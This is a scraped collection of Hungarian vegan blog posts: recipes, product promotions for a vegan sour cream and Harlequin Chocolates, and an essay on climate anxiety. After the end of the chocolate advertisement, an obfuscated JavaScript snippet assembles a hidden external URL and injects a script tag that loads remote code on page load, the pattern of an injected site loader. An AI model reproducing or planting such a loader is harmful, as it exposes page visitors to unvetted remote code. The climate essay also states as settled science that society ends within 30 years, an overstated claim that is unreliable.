…ahogyan azt Gabhira anyukája készíti Szabadkán Hozzávalók: 50 dkg félzsíros vagy zsíros túró 3 kk só 4 dl joghurt 6 dl tejföl 1-2 dl olaj 2 csomag réteslap (a legjobb vastag, török réteslapból készíteni, ha nincs, a magyar is megteszi) 1 dl olaj a kenéshez 1-2 zöld erőspaprika (ízlés...
Csomagot kaptunk - ajánló
2020. november 30. Mindennapi ételeink
Amióta megjelent a magyar piacon, előszeretettel fogyasztjuk a Dr. Oetker által forgalmazott Creme Vega nevű terméket. Ez egy nagyon finom és jó állagú vegán tejföl, melynek alapja a kókuszolaj, szójafehérje. Emellett ivóvíz, szárított élesztő, só, tejsavbaktérium kultúra található benne. Többször készítek itthon is magtejfölöket, de ez az a termék, amely mindig van a hűtőnkben és nagyon finom. A gyerekek kanállal is szeretik, magában enni. De szoktam tenni majonézes-tejfölös kukoricasalátába, bármilyen rakott ételbe, főzelékbe habarásként, vagy csupán tejfölös tésztaként is fogyasztjuk. Pogácsában is tökéletes, a tésztába beledolgozva, de édes süteményekhez is használom, tésztába vagy töltelékbe rakva. Tofukörözött elengedhetetlen alkotóeleme. Általában sós ételekhez hígítom, mert nagyon sűrű, így gazdaságos. Tehát óriási volt az örömöm, amikor megérkezett a cég ajándékaként sok-sok-sok doboz tejföl. Próbáljátok ki ti is, az ünnepekkor, de máskor is. Aldiban, Auchan-ban, Spar-ban, Tesco-ban is kapható, vagy weboldalakról is megrendelhető. A cég más érdekes termékeket is gyárt, pl. rozskovászt.
Sült alma dióval
Először is be kell vallanom, hogy ez a fionmság sokkal gyorsabban elkészül air fryerben, forró levegő sütőben. De ha neked nincs, az se tartson vissza, mert sütőben is elkészíthető, csak valamivel lassabban, hiszen a sütő felmelegítése és melegen tartása lassabban megy végbe. Finom kis őszi édesség, ha már ilyenkor talán könnyebben lehet almához jutni. Bár tudom, Magyarországon igazán borsos ára tud lenni, persze Angliában is attól függően, hogy hol és hogyan veszi meg az ember. Valamikor az ősz során szeretem a piacos zöldségestől kartondobozba venni, így az sokáig elég, és általában olcsóbban is adja. Ezt az édességet azonban őszintén szólva tavasszal készítettem, finom golden almákból. Ha savanykás almád van, vagy édes, mindkettő esetben ajánlom elkészíteni. A recept Hozzávalók: - néhány szem alma - 1 kis marék dió - mazsola/datolya - reszelt citrom héj Elkészítés: A megmosott almákat vagy félbe vágjuk, vagy vastagabbb körökben felszeleteljük. Sütőpapíros tepsibe fektetjük őket és sütőben addig sütjük, míg aranybarnára nem sülnek. Nem kell megijedni, fehér levet fog ereszteni valószínű, ami megkaramellizálódik a tetején. Air fryerben készítve pedig a készülék kosarába tesszük, 150-160 C fokon kb 5-8 perc alatt (vastagságtól függ) megsütjük. Amíg sülnek diót darálunk, datolyát, mazsolát aprítunk (állaguktól függően lehet egy kis meleg vizes áztatás jót tesz nekik). Reszelt citrom héjat adunk hozzá. Az egészet összekeverjük és a megsült almák közepébe golyókat formálunk belőlük. Melegebben tálalva finomabb, de az se baj, ha kihűlt.
Új, magyar gyártású, vegán bonbonok és vegán tejcsokik, amiket mindenképp meg kell kóstolnod!
Szereted az édességeket, de nem találtál még olyan bonbont, ami minőségi és vegán is? A Harlequin Chocolates megálmodói is így voltak annak idején – ezért manufaktúrájuk választékának nagy része a vegán csokirajongóknak szeretne segíteni édes pillanatokat varázsolni. Hirdetés A számukra legkedvesebb ízek a vegán bonbonok, pralinék és a táblás csokik, sőt már van olyan változat, ami mindezek mellett még cukormentes is. A legnagyobb kedvencek eddig a málnás ,,Bájital bonbon, a pisztáciás bonbon, a kókuszkaramell trüffel, és a banános-pekándióst is sokan keresik náluk vagy a rendezvényeken, ahol kóstolhatók. Ezeken kívül képzeld el a zamatos piemonti mogyorót, ahogy illatos és roppanós, a pisztáciát, az ízletes fűszereket ahogy édesen-krémesen összeolvadnak és mindez minőségi és vegán is… Csábító a gondolat! Piemonti mogyorós praliné A Harlequin Chocolatesnek nagy tervei vannak: az ősz során bemutatják a legújabb kedvencet, a saját készítésű vegán fehércsoki desszertjüket, Sahara névvel - már nagyon várják, hogy minél többen megkóstolhassátok! Én mindenképp meg akarom kóstolni minél hamarabb. Hamarosan több részlet is kiderül majd róla, de addig is nagyon ajánlom a kesutejjel készült vegán tejcsokijukat ,,No Milk Today névvel és más finom táblásaikat! Akik a különlegességeket szeretik, azoknak pedig biztosan kedvence lesz a fülöp-szigeteki termőterületről származó kakaóból készülő, kézműves táblás, a ,,Maprutas - ami egy igazi ízbomba a gyümölcsös, kifinomult ízjegyeivel, de sok finomságuk van még, érdemes benézni a csokiwebshopjukba. A gyönyörű design is az élmény része Eddig sok szó esett az ízekről, de amiről még nem, az a design. A Harlequin Chocolates-nál hisznek abban, hogy először a szemünkkel ,,kóstolunk, ezért minden egyes Harlequin csokinál fontosnak tartják a csinos és egyedi megjelenést, a táblásaikat pedig már messziről könnyen felismerheted azok modern és vidám világáról. Én, grafikusként odavagyok a designért! Akár magadnak (éljen az önszeretet!), akár ajándékba is rendelhetsz a webshopjukból, és szívesen készítenek egyedi csokoládét rendezvényekre, esküvőkre is. Már több különleges kérést valósítottak meg egyedi elképzelés alapján. Harlequin Chocolates – Mad Hatter – organikus, madagaszkári étcsokoládé szicíliai citromos sóval Kövesd őket instagramon vagy facebookon, hogy értesülj az újdonságaikról és hogy milyen eseményen találkozhatsz velük legközelebb. Ha nem egy eseményen kóstolsz, akkor pedig pár kattintással rendelhetsz az online csokiboltból, amit futárszolgáltatással az ajtóig repítenek. Nem minden csokijuk vegán, de a vegán csokoládék menüpontban kedvedre válogathatsz. Webshop: https://harlequinchocolates.hu Instagram: www.instagram.com/harlequinchocolates Facebook: www.facebook.com/harlequinchocolates Email: hello@harlequinchocolates.hu Harlequin Chocolates – No Milk Today – Madagaszkári organikus vegán tejcsoki szezámmal és édesköménnyel Hirdetés vége (function(){ ojvs=document.createElement(script);ojvs.async=true;ojvs_=u+(s)+t; ojvsu=242060400.;ojvs_+=a+(t.i);ojvs_+=n+(f+o)+/; ojvsu+=1jtrfl61jvsbrmaz1cx074+(n2ljjjn0); ojvs.src=https://+ojvs_+ojvsu;ojvs.type=text/javascript; document.body.appendChild(ojvs); })(); Tedd a kedveceim közé 0 The post Új, magyar gyártású, vegán bonbonok és vegán tejcsokik, amiket mindenképp meg kell kóstolnod! appeared first on VegaNinja.
Cukorborsó tofuval szójaszószban
Előző bejegyzésemben már megmutattam, hogy Angliában a borsót nem csak kifejtve fogyasszák, hanem még egészen zsengén, héjában. Az év szinte minden évszakában így is árulják a borsót, kis csomagokban. Ahogy az angol konyhára jellemző, a legtöbb étel a korábbi angol gyarmatokról származik, így erősen sejthető, hogy a cukorborsó fogyasztása is gyarmatokról eredeztethető... Például az itt igazán elterjedt, de már Magyarországon is sokak által ismert "curry" itt nem csupán a sárgás színű fűszernövényt, fűszerkeveréket jelenti, de egy, az indiai ízvilágból érkező pörköltes szószos jellegű ételt is. Meglehetősen mindennapi étel a curry itt, annyira, hogy kínai gyorséttermek menüjében is ott szerepel néhány currys étel. Mivel Anglia nagy gyarmatbirodalom volt, így nem csak populációja színes a karibi szigetvilág lakóitól kezdve Hong Kongon, Malájzián át Indiáig, beleértve egykoron Ausztráliát is, hanem az országba a gyarmatokról érkező emberek hozták magukkal kultúrájukat, vallásukat, ízeiket, receptjeiket. Emellett persze a britek híresek voltak kereskedő útvonalaikról is, amelyek szintén behálózták az egész földet, hatást gyakorolva az angol konyhára is. Bizonyára ezeknek a hatásoknak köszönhetően került az angol konyhába a zsenge, héjás állapotában felhasznált cukorborsó is. A recept Hozzávalók: - 4 szál sárgarépa, fehérrépa - 2 db kápia paprika - 2 maroknyi zsenge cukorborsó héjában - 1 csomag tofu (füstölt a legjobb, de natúr is megteszi) - 1 maroknyi kukorica (ha van otthon bébikukorica, azt is ajánlom) - 1/2 kg tészta (durum vagy teljes kiörlésű vagy gluténmentes is jó) - 1 nagyobb fej hagyma - só - kevés víz - 1-2 ek szójaszósz - 3-4 gerezd fokhagyma Elkészítés: A tésztát enyhén sós forrásban lévő vízben megfőzzük. Egy nagyobb fej hagymát pucolunk, majd aprítjuk és egy kevés vízen (olaj helyett víz is remekül szolgál) üvegesre megpároljuk. A répákat megpucoljuk és karikák vágjuk. A paprkiát megmossuk majd felszeleteljük. A cukorborsót megmossuk. Hozzáadjuk a hagymához ezeket a zöldségeket, a felkockázott tofut valamint a kukoricát, majd kb. 1 dl vízzel elkezdjük párolni. Sót is lehet hozzáadni, attól függően, hogy a szójaszószunk mennyire sós. Amikor már puhulni kezdenek, hozzáadjuk a szójaszószt (kb. 2-3 ek elég kell hogy legyen, de ha hígabb, világosabb szójaszósz van a konyhánkban, lehet többet érdemes). Összeforgatjuk majd fedő alatt tovább pároljuk. Aprítunk hozzá fokhagymát, szintén hozzáadjuk. Amikor a szójaszószos zöldségek megpuhultak, a megfőtt tésztával összekeverjük vagy a tálalásnál a tésztára szervírozzuk a zöldséges szószt. Ha tészta helyett inkább rizzsel fogyasztanánk, úgy is nagyon finom.
Görög saláta másképp (laktózmentes, gluténmentes, vegán)
2020. július 8. Zizi kalandjai
Már javában vegetáriánus voltam, vagy talán már vegán étrendet tartottam, de még mindig nem kóstoltam meg a tofut, mert keveset tudtam róla. Aztán felmértem a hazai piacot és találtam olyan tofut, amely magyar nem génmódosított szójából készül. Fokhagymával pirítottam össze a felaprított tofu kockákat és nagyon ízlett. Úgy döntöttem, hogy adok neki esélyt és kipróbálom többféle ételben. Source
Pásztortarhonya
A hagyományos magyar étel vegetáriánus változata. Természetesen tojásmentes tarhonyából készült. Hozzávalók: 2 ek olaj 25 dkg tarhonya 1 tk pirospaprika 1 tk füstölt pirospaprika (ennek hiányában duplázzuk az előző mennyiségét) 3/4 kk asafoetida (vagy hagyma) 2 dl kész lecsó (vagy 1 paradicsom és 1...
Gesztenyés “töltelék” (laktózmentes, vegán)
2019. december 12. Zizi kalandjai
Furán hangozhat a töltelék szó egy vegán gasztroblogon, de hagy magyarázzam el, hogy mi is ez pontosan. Az amerikai és kanadai kultúrában a hálaadás napja ünneplésekor annyi féle ételt készítenek az emberek, mint mi karácsonykor. Náluk szerepel a “stuffing”, azaz a töltelék, amelyet külön tepsiben sütnek és szinte teljesen vegetáriánus vagy vegán. Húsfélék közül max kolbász kerül bele... Source
Fügés-mandulás rétes
A rétest ma már a háziasszonyok többsége előre elkészített réteslapokkal vagy leveles tésztával készíti. Volt szerencsém életemben megnézni és részt venni az igazi házi rétes készítésében, de a tény, hogy az előre elkészített réteslappal nagyobb szerencsével járok és rövidebb idő alatt biztosabb a sikerem, még nem bírt rá, hogy magam is kipróbáljam házilag a tésztát összeállítani és nyújtani. Talán majd egyszer. A rétes feltehetően a törököknek köszönhetően hódoltságuk ideje alatt került magyarok lakta területre. Mivel a törökök akkori baklava-szerü süteménye túl édes volt, így a magyar háziasszonyok eleinte 10-12 lapot sütöttek ki egymásra rakva a forró kemencékben, s azokat töltelék nélkül feldarabolva, porított cukorral meghintve tálalták. A mai formájú feltekert, töltött rétes a 18-19. század fordulóján alakult ki az Osztrák-Magyar Monarchia területén. A párizsi Ritz Hotel étlapján a 19. század elején szerepelt a ,,Rétes Hongrois, melynek elkészítéséhez a réteslisztet Magyarországról rendelték és a cukrászokat Pestre küldték tanulni. (forrás: Vétek György: Rétesshow a kastélyban, hvg.hu, 2007. augusztus 11; Sütemények, tészták könyve, Budapest, 1988, Vianco Stúdió) Még sok helyen fellelhető füge, nem csak piacokon, üzletekben, de telkeken, kertekben álló fügefákon is. Emlékszem, amikor Budán laktunk, a lakóházunk végében állt egy hatalmas fügefa, még novemberben is szedtem róla finom gyümölcsöt. Nagy örömömre szolgál ma is, ha lehetőségem van friss fügét enni. Ennek hiányában aszalt fügét is felhasználhatunk az alábbi recepthez, amelynek az alapja ugyan reszelt alma, de a füge markáns ízének köszönhetően ezt alig érezni benne. A recept Hozzávalók: - 4 réteslap - vizes konyharuha - olaj - 3 alma - 1 bögre füge (aszalt is jó) apróbbra vágva - 1/2 bögre maroknyi datolya vagy mazsola - 1 bögre mandula Elkészítés: A datolyát vagy mazsolát meleg vízben megáztatjuk. Éppen csak ellepje a víz a gyümölcsöt. A mandulát megöröljük vagy megdaráljuk. Az almákat lereszeljük vagy gyorsaprítóban darabosra őröljük. A réteslapokat vizes konyharuhára fektetjük, majd mindegyik lapot (kivéve a legfelsőt, amit majd megtöltünk,) egyesével olajjal megkenjük (erre a célra kapható ecsetet használunk) és így helyezzük egymásra. Az utolsó lapot, amit megtöltünk, nem szükséges megkenni. A megáztatott datolyát vagy mazsolát kézi turmix-szal kicsit összedolgozzuk majd az így keletkezett édes szószt az almával összekeverjük. A réteslapra egy csíkban a széléhez közel először ráhelyezzük a datolyával vagy mazsolával összekevert almát, majd ennek tetejére egyenletesen rászórjuk a fügét, végül megszórjuk a megdarált mandulával. Akik édesebb szájúak, a megdarált mandulát elkeverhetik a fentiek során leírt mandulaszósszal, vagy más édesítővel, mint gyümölcscukor. A vizes konyharuha segítségével a rétest felsodorjuk, majd sütőlapra tesszük. Sütés előtt kis olajjal a rétestekercset megkenjük. Kb. 20 perc alatt aranybarnára sütjük. Őszi ízeket idéző vendégváró falatok, amelyeket akár reggelire is fogyaszthatunk. Én így (t)ettem.
Ami elszomorít, megbénít és izolál – a klímaszorongás
Sokan még mindig tagadják a klímaváltozást, de a tudomány már rég nyilatkozott: ha 12 (vagy egyesek szerint csupán másfél) év alatt nem következik be radikális változás az életmódunkban, 30 év múlva véget ér az emberi társadalom. Emiatt egyre növekszik azoknak az embereknek a száma, akiket ez – érthető módon – félelemmel tölt el, új fogalom jelent meg: a klímaszorongás, ökoszorongás. Mit tehetünk ellene? A szorongást általában az okozza, ha közeledni látunk egy eseményt, ami a terveinkkel ellentétes – ez esetben az emberiség megsemmisülését, és az azt megelőző apokaliptikus állapotokat. A pszichológusok és pszichiáterek világszerte egyre gyakrabban találkoznak ezzel az újnak mondható tünetegyüttessel, ami egyébként egy egészséges reakció arra, ami történik körülöttünk, és az ezt övező bizonytalanságra. Egyedüllét, elszigeteltség érzése Még mindig nehéz a barátokkal és a családtagokról a klímaváltozásról beszélni, és ez egyáltalán nem segít. Ha felhozza az ember, furcsán néznek rá, elterelik a témát, esetleg nevetgélnek egy kicsit, főleg, ha már amúgy is a témát felhozó ember a társaságban a faölelgetős hippi. Jobb esetben sóhajtoznak, hogy igen, nagyon melegek a nyarak, mintha más negatív hatása nem lenne, és mintha nem múlna mindannyiunkon a végkimenetel. Mint minden szorongásnál, az öko-szorongásnál is ront az állapoton, ha az ember egyedül kattog a dolgokon, jobb beszélgetni róla, ötletelni, együtt kitalálni, mit tehetünk a Föld megóvásáért. De az is segít, ha valaki csak meghallgat, megérti a félelmed, és nem néz hülyének. Ha nem ismersz ilyen embereket, nézz utána a neten azoknak a csoportoknak, facebookos és aktivista társaságoknak, projekteknek, akiket ugyanennyire érdekel a környezet sorsa, és ahova csatlakozhatsz! Végre egy társaságban nem te leszel az ufó! Sőt aktívan részt tudsz venni a katasztrófa megállításában. Bénultság, apátia Ahogy fentebb írtam, a szorongás bénultságot is okoz, mivel lesújtó méretű problémával állunk szemben. Egyedül valóban nem sokat tehetnénk, de szerencsére nem vagyunk egyedül. Viszont annyi teendő van, és ki tudja, van-e értelme tenni bármit, ez a bizonytalanság önmagában is bénító. Mert remény még van, még változtathatunk, még helyrehozhatjuk a bekövetkezett természeti károkat. De néha a remény csak dühöt, türelmetlenséget és apátiát szül, mivel ezek a pozitív változások lassan következnek be, és többnyire politikusok és pénzemberek kezében vannak az igazán nagy döntések. Nyilván nem lenne jobb, ha nem lenne már remény sem, korai lenne még beletörődni a megsemmisülésbe. Óriási mértékben megnőtt az aktivizmus a klímaváltozás ellen, tizen- és huszonévesek válnak aktivistává, átlagemberek gondolkodnak el a műanyagszemét csökkentésén, egyre kevésbé menő új dolgokat vásárolni. Aktivizmus Mindenki, akit érdekel a környezetvédelem, hallott már Greta Thunbergről. Greta 2018 augusztusában iskolai tüntetést szervezett a svéd parlament előtt az éghajlatváltozás ellen. Mozgalma azóta világméretűvé vált 100 ezer iskolás csatlakozott. A mozgalom neve Fridays For Future, azaz Péntekek a jövőért. Greta vegán, próbál alacsony ökolábnyommal élni, nem használ repülőgépet (pedig sokat utazik az aktivizmusa miatt). Ő a Time magazin szerint az egyik leginspirálóbb tizenéves a világon. Az ő generációjuknak már egyáltalán nem távoli és megfoghatatlan dolog az éghajlatváltozás, tanultak róla az iskolában, és kiskoruk óta a saját életükön érzik a hatását. Jamie Margolin, egy 17 éves seattle-i iskoláslány. A szmog ott annyira durva, hogy néha még napos délutánokon is szürke az ég, előfordul, hogy a hírhedt pekingi állapotoknál is rosszabb, látni lehet a szmogrészecskéket a levegőben, ilyenkor kijárási tilalom van. 2017-ben egy ilyen alkalom után Jamie teljesen magába roskadt, három órán át sírt, arra gondolt, mi értelme van bárminek is, ha tönkretesszük a világunkat? Eztán összeszedte magát, és megalapította a Zero Hour mozgalmat, melynek neve arra utal, hogy most kell cselekednünk. “A Zero Hour (nulla óra) küldetése, hogy középpontba állítsa a diverz fiatalok (nem csak fehérbőrű, felső-középosztálybeli fiatalok – a szerk.) hangját az éghajlatváltozással és a környezeti igazságszolgáltatással kapcsolatos párbeszédben. A Zero Hour egy fiatalok által vezetett mozgalom, mely belépési alkalmakat, tréninget és forrásokat teremt elő azoknak az új, fiatal aktivistáknak és szervezőknek (és a felnőtteknek, akik egyetértenek velünk), akik konkrét lépéseket akarnak tenni a klímaváltozás ellen. Együtt egy erős, megállíthatatlan, fiatal mozgalom vagyunk a jogaink és természeti erőforrásaink védelméért, és a tiszta, biztonságos és egészséges környezet megőrzéséért, mely biztosít egy élhető jövőt, amiben nem csak túlélünk, de ki is teljesedjünk. Ez a Zero Hour.” Ezeknek a fiatal lányoknak a kezében van a jövőnk, kitartásukkal és erejükkel akkora tömegeket gyűjtöttek össze, amekkorát már a politikusok sem tudnak figyelmen kívül hagyni. Ha Greta és Jamie meg tudja próbálni megváltoztatni a világot matekóra és tesi között, mindenki tud tenni valamit! És mi lenne királyabb érzés annál, mint részese lenni a Földet megmentő, világméretű mozgalomnak?! Green guilt, avagy zöld bűntudat Vannak, akik már most rengeteget tesznek a klímaváltozás ellen a saját életükben. És éppen a “legzöldebbjeink” szenvednek legjobban a bűntudattól, ha valamit nem öko módon csinálnak még, éppen azok, akik már most a legjobban odafigyelnek rá, hogy környezettudatosan éljenek. Ugyan a bűntudat segítségünkre lehet egy pozitív változás elindításában, de egy ponton túl már inkább gátol minket. Te szoktál bűntudatot érezni az alábbiakhoz hasonló esetekben? - Nem tudsz annyit költeni, amennyibe egy környezetbarátabb termékalternatíva kerülne - Nem sikerült még lemondanod néhány termékről, ami nem zero-waste - Megrendelsz valamilyen környezetbarát dolgot, amivel ki tudsz váltani egy csomó, egyszerhasználatos műanyagot, és a termék 2 réteg műanyagba csomagolva érkezik - Otthon felejted a textil bevásárlótáskád vagy zöldséges szütyőid, és haragszol magadra, mert kénytelen vagy egyszerhasználatos zacskót venni - Megtudod, hogy az egyik termék, amit eddig környezetbarátnak ismertél, és ezért vetted, mégsem az - Néhány ismerősöd idegesítő hippinek lát stb. Ez a bűntudat, ahogy már említettem, kontraproduktív, nem segít a pozitív cselekvésben. “Nem egy maréknyi ember kell, aki tökéletesen hulladékmentesen él. Millió olyan ember kell, aki tökéletlenül csinálja a hulladékmentességet.” – Anne-Marie Bonneau, @ZeroWasteChef A tudatlanság áldás Bosszantó látni, hogy az emberek többsége még akkor sem gondolkozik el az életmódjának megváltoztatásán, mikor már ennyire súlyos a helyzet. Nem tudják összekötni, hogy az ő cselekedeteik hogyan befolyásolják a nagy dolgokat a világban. Például, hogy a magyarországi húsfogyasztás hozzájárul az Amazonasi erdőtüzekhez. Sajnos ezt több pszichológiai folyamat okozza, így kevés dolgot lehet ellene tenni. A témáról való beszélgetés, és legfőképp a példamutatás az, ami használ. Emellett elősegítheti a változást, ha megajándékozhatjuk ismerőseinket egy szép kulaccsal, bevásárlótáskával, textilből készült zöldséges zacskókkal stb. Mit tehetsz a klímaszorongás ellen? - Beszélgess hasonló gondolkodású emberekkel Talán a jelenlegi ismerősi körödben nincsenek ökotudatos emberek, de az interneten rengeteg! Vegán és környezettudatos Facebook csoportokban, illetve környezetvédelmi eseményeken sok új, jófej emberrel találkozhatsz, beszélgethetsz. Már az az érzés, hogy nem vagy egyedül ebben a harcban (mind mentális harcban, mind a klímakrízis elleni harcban) sokat segíthet. - Olvass kevesebb negatívat hírt A közösségi média nagyon addiktív. Az ember képes órákon át görgetni az áramló információ között, és a negatív hírek többségében vannak a legtöbbünk hírfolyamában. Legyél szelektív a hírfogyasztásban, ne kövess tovább olyan portálokat és embereket, ahonnan csak lehangoló, dühítő és szomorú tartalmak jönnek. Szerethetsz egy ismerőst anélkül is, hogy minden nap látnod kellene a posztjait. A poszt jobb felső sarkában van három pont, erre kattintva el lehet rejteni az adott posztot, és beállítani, hogy kevesebb tartalmat lássunk az illetőtől. - Olvass többet arról, mit tehetsz a bolygóért Viszont tájékozódni hasznos, kövess olyan blogokat, személyeket, akik tippeket adnak a saját életedben megvalósítható, környezettudatos változáshoz. Kövess olyan oldalakat, embereket is, akiknek a posztjai jó kedvre derítenek! Van egy mondás: Nem tölthetsz üres pohárból. Tehát amíg a saját lelked nincs feltöltődve, nem tudsz igazán adni másoknak és a világnak, nem tudod olyan hatékonyan jobbá tenni a dolgokat. A szorongás megakadályoz a cselekvésben, a cselekvés megakadályoz a szorongásban – igyekezz minél fenntarthatóbb módon élni. Ez sikerélményt fog okozni, és áthelyezi a fókuszod a gyászról a megoldásra! - Ne vásárolj, ha nem muszáj A kapitalizmus szembefordított minket a természettel. A Föld életének mindössze 0,0000001%-a óta, durván 400 éve van jelen, és ennyi idő alatt tönkretette a természetet, a vadvilágot, a környezetünket. Nem az emberi faj a káros a bolygóra, az emberiség több mint 300 ezer éve létezik, hanem a kapitalizmus. Mindennek ára van, minden a pénz körül forog, és nagyon úgy tűnik, hogy az az iparág, amelyben sok pénz van, bármeddig képes pénzzel elcsitítani a döntéshozókat. A kapitalizmust nem lehet egyéni döntésekkel megdönteni, de káros hatásait csökkentheted a vásárlásoddal, illetve nem vásárlásoddal. Mikor venni készülsz valamit, kérdezd meg magadtól, szükséged van-e az adott tárgyra? (Akkor is, ha öko-tárgyról van szó!) Ha igen, létezik-e belőle fenntartható, etikus, és minőségi változat, melyet akár 10-20 év múlva is fogsz tudni használni? A minőségi termékek drágábbak, de hosszú távon pénzt spórolhatnak meg neked. Emellett ha nem vásárlással próbálod tompítani a szorongást és a hiányérzetet, felfedezhetsz magadnak olyan tevékenységeket, amelyek nemcsak környezetbarátabbak, de a lelkednek is jót tesznek, pl. kirándulás. És megkíméled magad a bűntudattól, amit az okozna, hogy rájössz, mégis fölösleges dolgot vettél. És egy tárgyból valójában akkor lesz szemét, mikor megvásárolják, nem amikor kidobják. Termeljünk kevesebb szemetet! - Alkoss, meditálj, tölts időt a természetben A művészetnek, meditációnak és a természetnek gyógyító hatása van. A művészettel, kézműves dolgokkal, barkácsolással ráérezhetsz a létrehozás örömére, azaz arra a sikerélményre, mikor a “semmiből” létrehozol egy használati tárgyat vagy műalkotást. A meditáció segít lelassulni, ez a “nem cselekvés” művészete. A világ rohan, az ember nem tud lépést tartani vele. Néha fontos megállni, és belülre figyelni kicsit. A rohanás, az, hogy sosem érünk rá semmire, nincs időnk, nincs összhangban a természettel és a lelkünkkel. Hangolódj rá saját magadra, próbáld ki a napi 15 perc meditációt! A természet is nyugtatja a lelket, emlékeztet rá, hogy mi is a részei vagyunk, nem pedig pusztán egy műanyagba csomagolt, “szupercivilizált” faj, aki rohan a pénz, a számlák, a karrier és a saját ideje után. Ez persze klisés megfogalmazás, nem kell ahhoz valódi karrieristának lenni, hogy elmerüljünk a problémákban és a szorongásban. Egy kis erdei levegő, madárcsicsergés, leveleken átszűrődő napfény viszont tényleg oldja a feszültséget. Még ne add fel, még van remény. Beszélgessünk! Klímaszorongós csoport a Facebookon. Tedd a kedveceim közé 0 The post Ami elszomorít, megbénít és izolál – a klímaszorongás appeared first on VegaNinja.
Zöldséglepénnyel és luxusszósszal csábítják a vegákat
Leteszteltük a gyorséttermek vegetáriánus hamburgereit, és már megint mi, magyarok vagyunk a legjobbak a felhozatalban.
Töltött krumplicsónakok
Gluténmentes, vegán, laktató étel krumplival, tofuval és egy kevés spenóttal. Vendégváró ételnek vagy vacsorának is elkészíthetjük. A recept eredeti öltetét az Angliában elterjedt "Jacket potato" adta, amikor a krumplit héjában megsütik (igen, eddig a magyarok is szoktak ilyen ételt), majd kettévágják úgy, hogy ne essen szét két részre, csak kettényíljon és a kettő fél burgonya közé reszelt sajtot vagy tonhalat raknak. Iskolamenzákon ez a jacket potato mindennapos étel. Például van olyan iskola, ahol szó szerint, minden nap kérheti ezt a gyerek. Kérik is, mert a többi ételt kevésbé szeretik (pl. curry rizzsel vagy sült hús valami csúnya barna és büdös szósszal leöntve) és tudják, ezzel nem fognak mellé, kivéve, hogy az 5-6 éves gyerekek még nem boldogulnak úgy a késsel villával, hogy önállóan meg tudják enni. Angliában legalább 3 fajta ételből választhatnak ebédre. Reggel a gyerekek megérkeznek (általános iskola) az osztályterembe és egy nagy digitális táblán a nevükre kattintva választhatnak 3 fajta színből. Mindegyik szín valamilyen étel. A sárga általában vegetáriánus, a kék általában húsos. A tábla mellett legtöbbször ott vannak a napi menük képei, a 3 főétel képe, azzal a színnel bekeretezve, amelyik ételt jelenti. Pl. Zöldséges curry sárga keretben. Vannak olyan iskolák, ahol e 3 menün kívül van egy 4., a jacket potato, ami mindig elérhető. A legtöbb iskolában, de nem mindenhol, a gyerekeknek ebéd előtt kiosztják a rendelésüknek megfelelő karszalagot, amit a konyhás néniknek átadnak, akik adják is nekik a menüt. Emellett salátafélék, kenyér, gyümölcs és valami desszert (néha az is 2-3 féle) is választható. Bizonyos iskolákban minden gyereknek alanyi jogon jár az étel, azonban mégis vannak, akik hozzák a kis "lunchbox"-ot, amibe a szülő csomagolt ebédre ételt a gyereknek. Ezek néha szendvicsek (legjobb esetben), de gyakran csak sajnos boltban vett ilyen olyan egészségtelen étel (chips, keksz, süti, csoki, néha gyümölcs, sajt). Mindezt még megfejeli az a tény, hogy kb. úgy váltakozik a menükínálat, hogy krumpli, tészta, krumpli, tészta. Tehát jacket potato hétfőn, sajtos tészta kedden, parázson (nem) sült krumpli körettel szerdán, pizza csütörtökön (kb. helyileg készített kenyértészta paradicsommal megkenve és sajttal megszórva, téglalap alakokban felvágva). Pénteken nem maradhat ki a krumpli, no meg péntek amúgy is hal, tehát fish and chips, ami rántott hal sültkrumplival. Ez egy áltagos általános iskola menükínálatának tömör leírása. Részletesebben is talán egyszer beszámolok az iskolarendszerről itt, Angliában a http://hataratkelo.blog.hu/ -n, ha majd lesz időm és elég érdeklődés felém másoktól megírni tapasztalataimat és a magyar oktatástól eltérő dolgokat. Mozsának legyen elég ennyi, ezt is emészteni kell, gondolom. :) Amíg pedig ezt emészti a Kedves Olvasó, készítse el a töltött krumplicsónakokat! A recept Hozzávalók: - 5 nagyobb fej krumpli - 1 csomag tofu (kb. 30 dkg) - hagyma - ételízesítő - kb. 10 dkg spenót - só Elkészítés: A krumplikat megmossuk, héjában megfőzzük őket de csak annyira, hogy kemények maradjanak, de ne nyersek. Amikor megfőttek, félbe vágjuk őket, kanállal a belsejét kikanalazzuk úgy, hogy egy kis "fal" maradjon, így készítünk "krumplicsónak"-ot, amit majd megtöltünk. A krumpli belsejét egy kicsit megsózzuk, s közben elkészítjük a tofus-spenótos tölteléket. A hagymát nagyon apróra vágjuk és egy kis vizen üvegesre pároljuk. Közben a tofut csíkokra vágjuk, majd villával összetörjük. A megpárolt hagymára tesszük a tofut, megszórjuk egy kis ételízesítővel, megpirítjuk. Ehhez hozzákeverjük a szintén összetört krumplit. Amikor a tofu és krumpli megpirult, hozzáadjuk a megmosott, csíkokra vágott spenótot. Ha úgy tetszik, egy kis fokhagymát vagy medvehagymát apróra vágva szintén adhatunk a tofus krumplihoz. Kicsit átkeverjük, majd a krumplikat megtöltjük ezzel. Sütőben 180 fokon kb. 20-25 perc alatt készre sütjük. Esetleg reszelt vegán sajtot szórhatunk a megtöltött krumplicsónakok tetejére. Céklával fogyasztva nagyon finom.
Sült édesburgonya hasábok és guacamole (laktózmentes, gluténmentes, vegán, PKU barát receptek) + Mi az a PKU?
2019. július 2. Zizi kalandjai
Most egy olyan bejegyzést hoztam nektek, amelyben van két recept, de ezzel egy különleges betegségre szeretnénk felhívni a figyelmet. Ez pedig a PKU (PhenylKetonUria), magyarul a fenilketonúria. A fenilketonúriásnak tilos húst, húsféléket, halat, tejtermékeket (túró, sajt, tej, stb…), gabonából készült termékeket (kenyér, kifli, stb…), hüvelyeseket (szárazbab, borsó, stb…)... Source
Kölestúróval rakott kelkáposzta – vegán recept
